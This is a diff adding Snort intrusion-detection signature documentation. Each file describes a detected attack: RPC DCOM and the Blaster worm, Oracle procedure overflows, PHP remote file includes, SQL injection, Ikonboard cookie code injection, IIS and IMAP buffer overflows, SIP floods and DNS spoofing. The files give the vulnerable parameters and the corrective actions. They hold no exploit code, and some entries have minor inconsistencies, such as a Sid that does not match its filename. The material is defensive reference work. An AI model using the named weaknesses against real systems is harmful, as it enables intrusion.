+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1593.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1593
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2352.txt
@@ -0,0 +1,87 @@
+Rule:
+
+--
+Sid:
+2192
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/3153.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+3153
+
+-- 
+Summary: 
+This event is generated when an inverse query attempt is made using TCP.
+
+-- 
+
+Impact: 
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Bind 8 contains a programming error that may present an attacker with
+the opportunity to execute code of their choosing on an affected server.
+
+The error occurs in the handling of malformed transactions. When using
+TCP this can result in the attacker causing a heap overflow.
+
+--
+Affected Systems:
+	Bind 8.
+
+--
+Attack Scenarios: 
+An attacker needs to send a specially crafted and malformed query to an
+affected server.
+
+-- 
+Ease of Attack: 
+Moderate.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/2603.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2603
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "create_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "fname" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck633.html
+
+--
--- /dev/null
+++ b/doc/signatures/100000553.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000553
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "PHPMySMS" application running on a webserver. 
+Access to the file "gateway.php" using a remote file being passed as the 
+"ROOT_PATH" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "ROOT_PATH" parameter in the "gateway.php" script used 
+by the "PHPMySMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMySMS
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/100000336.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000336
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpMyDirectory" application running on a webserver. Access to the file "footer.php" using a remote file being passed as the "ROOT_PATH" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "ROOT_PATH" parameter in the "footer.php" script used by the "phpMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpMyDirectory
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1536.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1536
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000858.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000858
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Professional Home Page Tools" application running on a webserver. Access to the file "class.php" with SQL commands being passed as the "text" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "text" parameter in the "class.php" script used by the "Professional Home Page Tools" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2627.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2627
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "repcat_import_check" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" or "gname"
+variable to cause the overflow. The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the
+database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/265.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+265
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/100000158.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000158
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of SIP INVITE messages 
+is received in a short time frame.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress, or simply 
+a poorly configured or implemented user agent.
+
+--
+Detailed Information:
+This rule is used to detect overly large numbers of SIP INVITE messages coming 
+into hosts on an internal network, which may indicate a denial of service 
+attack in progress. Since this traffic could also be the result of a poorly 
+configured user agent, or simply a very busy SIP proxy, careful analysis of 
+both the hosts receiving and sending this traffic is required before 
+determining that an attack has actually taken place.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with INVITE messages, causing 
+a denial of service.
+
+--
+Ease of Attack:
+Simple, as SIP is a public, well-documented protocol.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate INVITE requests, and 
+NAT devices may appear to be sending a larger number of INVITE requests than a 
+regular host. It is recommended that users whitelist known SIP proxies and NAT 
+devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/3120.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3120
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2037.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2037
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
--- /dev/null
+++ b/doc/signatures/100000159.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000159
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of SIP REGISTER 
+messages is received in a short time frame.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress, or simply 
+a poorly configured or implemented user agent.
+
+--
+Detailed Information:
+This rule is used to detect overly large numbers of SIP REGISTER messages 
+coming into hosts on an internal network, which may indicate a denial of 
+service attack in progress. Since this traffic could also be the result of 
+a poorly configured user agent, or simply a very busy SIP proxy, careful 
+analysis of both the hosts receiving and sending this traffic is required 
+before determining that an attack has actually taken place.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with REGISTER messages, 
+causing a denial of service.
+
+--
+Ease of Attack:
+Simple, as SIP is a public, well-documented protocol.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate REGISTER requests, 
+and NAT devices may appear to be sending a larger number of REGISTER requests 
+than a regular host. It is recommended that users whitelist known SIP proxies 
+and NAT devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
--- /dev/null
+++ b/doc/signatures/683.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid: 
+683
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_pa-pz_5x44.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2127.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2127
+
+--
+Summary:
+This event is generated when an attempt is made to access ikonboard.cgi
+on a web server. This may indicate an attempt to exploit an arbitrary 
+code execution vulnerability that affects Ikonboard web-based bulletin 
+board software.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit an 
+arbitrary code execution vulnerability in Ikonboard web-based bulletin 
+board software. An attacker can bypass user input validation by 
+inserting illegal characters into the "lang" value of a user cookie, 
+which then allows the attacker to pass arbitrary Perl code to the web 
+server.
+
+--
+Affected Systems:
+Any web server running Ikonboard bulletin board software.
+
+--
+Attack Scenarios:
+An attacker can provide a crafted cookie to the web server running 
+Ikonboard. The web server will then attempt to execute the arbitrary 
+Perl commands embedded in the cookie.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses ikonboard.cgi, this rule may 
+generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+An unsupported and unofficial patch is available at http://www.securityfocus.com/bid/7361/solution/.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7361
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11605
+
+--
--- /dev/null
+++ b/doc/signatures/405.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+405
+
+--
+
+Summary:
+This event is generated when An ICMP Source Host Isolated datagram is detected on the network.  
+
+--
+
+Impact:
+This is an indication of improperly configured routing equipment or network host.  RFC 1812 indicates that ICMP Type 3 ICMP Code 8 messages should never be generated.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network. Routers should never generate ICMP Type 11 Code 8 as they are in violation of RFC1812.   Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3058.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3058
+
+--
+Summary:
+This event is generated when a remote user sends an overly long string 
+to an IMAP server via the command COPY. This may indicate an attempt to 
+exploit a buffer overflow condition.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the 
+COPY command, a buffer overflow condition may occur. This can allow the
+attacker to execute arbitrary code, which may allow the attacker to gain
+root access to the compromised server.
+
+The attacker must use a valid IMAP account to exploit this condition.
+
+--
+Affected Systems:
+	IMAP servers
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long COPY command to the IMAP
+server, creating a buffer overflow condition. This can then allow the
+attacker to execute code of their choosing and possibly gain root access
+to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2743.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2743
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1020.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1020
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with a .idc extension. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports file extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request containing a file name with an extension of .idc, possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+Bugtraq:
+http://www.securityfocus.com/bid/307
+
+
+--
--- /dev/null
+++ b/doc/signatures/3193.txt
